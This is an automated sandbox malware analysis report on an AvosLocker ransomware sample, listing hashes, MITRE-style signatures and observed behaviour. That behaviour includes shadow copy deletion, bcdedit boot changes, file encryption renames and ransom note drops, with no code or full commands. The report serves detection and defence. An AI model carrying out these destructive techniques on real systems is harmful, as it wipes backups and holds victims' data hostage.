Malware Analysis Report

2024-10-16 03:28

Sample ID 230511-s9f6zsad87
Target Avos2.zip
SHA256 1198fb9117776809b11a19000161377384957bee846f7b25a610fc8ca082eb37
Tags
avoslocker evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1198fb9117776809b11a19000161377384957bee846f7b25a610fc8ca082eb37

Threat Level: Known bad

The file Avos2.zip was found to be: Known bad.

Malicious Activity Summary

avoslocker evasion ransomware

Avoslocker Ransomware

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-11 15:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-11 15:49

Reported

2023-05-11 15:51

Platform

win7-20230220-en

Max time kernel

73s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\GrantWait.png => C:\Users\Admin\Pictures\GrantWait.png.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\ImportComplete.raw => C:\Users\Admin\Pictures\ImportComplete.raw.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\NewBackup.tiff => C:\Users\Admin\Pictures\NewBackup.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeEdit.tiff => C:\Users\Admin\Pictures\ResumeEdit.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\UnregisterGrant.raw => C:\Users\Admin\Pictures\UnregisterGrant.raw.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\NewBackup.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeEdit.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\ConvertToSet.raw => C:\Users\Admin\Pictures\ConvertToSet.raw.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1700332598.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\clock.html C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\mpvis.dll.mui C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01293_.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\fr-FR\Mahjong.exe.mui C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Microsoft Games\Hearts\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH.HXS C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\OCEAN_01.MID C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\flyout.css C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00555_.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\AddInViews\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\THEMES.INF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV11.POC C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\OUTEX2.ECF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02198_.GIF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\README.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sv\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\settings.html C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\localizedStrings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\background.gif C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01638_.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.HXS C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00012_.WMF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1232 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
